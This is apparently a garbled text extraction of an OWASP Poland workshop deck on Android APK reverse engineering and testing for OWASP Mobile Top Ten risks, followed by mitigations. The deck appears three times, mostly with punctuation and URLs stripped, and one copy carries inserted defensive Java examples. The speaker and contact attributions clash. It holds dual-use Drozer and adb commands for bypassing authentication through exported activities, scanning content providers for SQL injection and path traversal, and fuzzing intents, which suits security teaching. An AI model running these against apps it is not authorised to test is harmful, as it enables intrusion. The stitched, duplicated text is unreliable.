id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Unintended data leakage – what it is
• Simple words definition: the OS/framework puts sensitive information in an insecure location on the device
• Important note: insecure data storage talks about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
  dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
  adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage – demo
Unintended data leakage – mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what is it
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
  dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication – demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise an operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication – mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…)
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if an application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography – example
• An encrypted db is definitely a good idea…
Broken Cryptography – example
• …but not when you're hardcoding the password to decrypt it in code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography – mitigations
• Use known, strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application, via an intent/content provider
  – A shared file
  – A server response
  – A third-party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, running a new activity, etc.) via special objects called Intents:
  Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
  dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
  dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
  dz> run app.package.manifest -a <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection – mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute exported="false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
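The mitigations above as an added Java/Android example that is not the workshop's code: an Activity that validates a URI received from another app before a WebView may load it, uses an explicit Intent for internal navigation, and binds parameters in a local SQLite query instead of concatenating input. The class names and the allowed host are placeholders.

```java
import android.app.Activity;
import android.content.Intent;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebView;

/*
 * Added example, not the workshop's code. Input that arrives from another app
 * (intent data), from a server response or from a web page is treated as hostile:
 * it is checked against an allow-list before it reaches the WebView, internal
 * navigation never uses an implicit Intent, and the local db gets bound parameters.
 * ALLOWED_HOST and the class names are placeholders.
 */
public class UpdateActivity extends Activity {

    private static final String ALLOWED_SCHEME = "https";
    private static final String ALLOWED_HOST = "updates.example.com"; // placeholder

    /** Returns the URI unchanged if it may be loaded, otherwise null. */
    static Uri validateUpdateUri(Uri uri) {
        if (uri == null || uri.isOpaque()) return null;                     // e.g. javascript:alert(1)
        if (!ALLOWED_SCHEME.equalsIgnoreCase(uri.getScheme())) return null; // blocks file://, content://
        if (!ALLOWED_HOST.equalsIgnoreCase(uri.getHost())) return null;     // only our own host
        if (uri.getUserInfo() != null) return null;                         // https://host@evil/ lookalikes
        if (uri.getPort() != -1 && uri.getPort() != 443) return null;
        return uri;
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        WebView web = new WebView(this);
        web.getSettings().setJavaScriptEnabled(false); // no JS needed, so no XSS/WebView injection surface
        web.getSettings().setAllowFileAccess(false);   // keep file:// out even if a check above is bypassed
        setContentView(web);

        // getIntent().getData() is attacker-controlled whenever this Activity is reachable
        // from another app (exported, or matched through an intent-filter).
        Uri target = validateUpdateUri(getIntent().getData());
        if (target == null) {
            finish();          // refuse; never fall back to the caller-supplied URI
            return;
        }
        web.loadUrl(target.toString());
    }

    /** Internal navigation: explicit Intent, so no other app's intent-filter can intercept it. */
    void openSettings() {
        startActivity(new Intent(this, SettingsActivity.class));
    }

    /** Local db lookup with a bound parameter instead of string concatenation. */
    static Cursor findNote(SQLiteDatabase db, String untrustedTitle) {
        // BROKEN: db.rawQuery("SELECT id, body FROM notes WHERE title = '" + untrustedTitle + "'", null);
        return db.rawQuery("SELECT id, body FROM notes WHERE title = ?", new String[] {untrustedTitle});
    }

    /** Placeholder target for the explicit Intent above (declared in the manifest with exported="false"). */
    public static class SettingsActivity extends Activity { }
}
```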
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
  - http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling – mitigations
• Invalidate the session on the server side
• Set a session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
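The four M9 mitigations above as an added Java example that is not the workshop's code: a server-side session store that issues SecureRandom tokens, expires them per application, and destroys a user's tokens when the authentication state changes. The class name is hypothetical and the in-memory map stands in for a real backing store.

```java
import java.security.SecureRandom;
import java.time.Duration;
import java.time.Instant;
import java.util.Base64;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

/*
 * Added example, not the workshop's code: a minimal server-side session store.
 * Tokens come from SecureRandom (never from a device ID), every token carries an
 * expiry chosen per application, and all of a user's tokens are destroyed when
 * their authentication state changes. The in-memory map is a simplification.
 */
public final class SessionStore {

    private static final SecureRandom RNG = new SecureRandom();
    private static final int TOKEN_BYTES = 32;          // 256 bits of entropy: unguessable

    private static final class Session {
        final String userId;
        final Instant expiresAt;
        Session(String userId, Instant expiresAt) { this.userId = userId; this.expiresAt = expiresAt; }
    }

    private final Map<String, Session> sessions = new ConcurrentHashMap<>();
    private final Duration ttl;

    /** ttl is the per-application expiry, e.g. minutes for banking, longer for a game. */
    public SessionStore(Duration ttl) { this.ttl = ttl; }

    /** Issues a fresh token after a successful login; the password itself is never stored. */
    public String create(String userId) {
        byte[] raw = new byte[TOKEN_BYTES];
        RNG.nextBytes(raw);
        String token = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
        sessions.put(token, new Session(userId, Instant.now().plus(ttl)));
        return token;
    }

    /** Maps a presented token to its user, or null. Expired tokens are destroyed on sight. */
    public String resolve(String token) {
        if (token == null) return null;
        Session s = sessions.get(token);
        if (s == null) return null;
        if (!Instant.now().isBefore(s.expiresAt)) {
            sessions.remove(token);
            return null;
        }
        return s.userId;
    }

    /** Logout: server-side invalidation, not just deleting the cookie on the phone. */
    public void invalidate(String token) { sessions.remove(token); }

    /** Password change, account switch or re-login: every older token for the user dies. */
    public void invalidateAllFor(String userId) {
        sessions.entrySet().removeIf(e -> e.getValue().userId.equals(userId));
    }

    /** Login on a device that already has a session: rotate instead of reusing. */
    public String rotateOnLogin(String userId) {
        invalidateAllFor(userId);
        return create(userId);
    }

    /** Housekeeping job: drop tokens nobody presented again before they expired. */
    public int purgeExpired() {
        Instant now = Instant.now();
        int before = sessions.size();
        sessions.entrySet().removeIf(e -> !now.isBefore(e.getValue().expiresAt));
        return before - sessions.size();
    }

    public static void main(String[] args) throws InterruptedException {
        SessionStore store = new SessionStore(Duration.ofMillis(200)); // short TTL only for the demo
        String first = store.create("alice");
        System.out.println("live token resolves to: " + store.resolve(first));     // alice
        String second = store.rotateOnLogin("alice");
        System.out.println("old token after re-login: " + store.resolve(first));   // null
        Thread.sleep(300);
        System.out.println("new token after the TTL: " + store.resolve(second));   // null
        System.out.println("purged: " + store.purgeExpired());                     // 0, already removed
    }
}
```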
Thank you
pawelrzepa@outlook.com
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
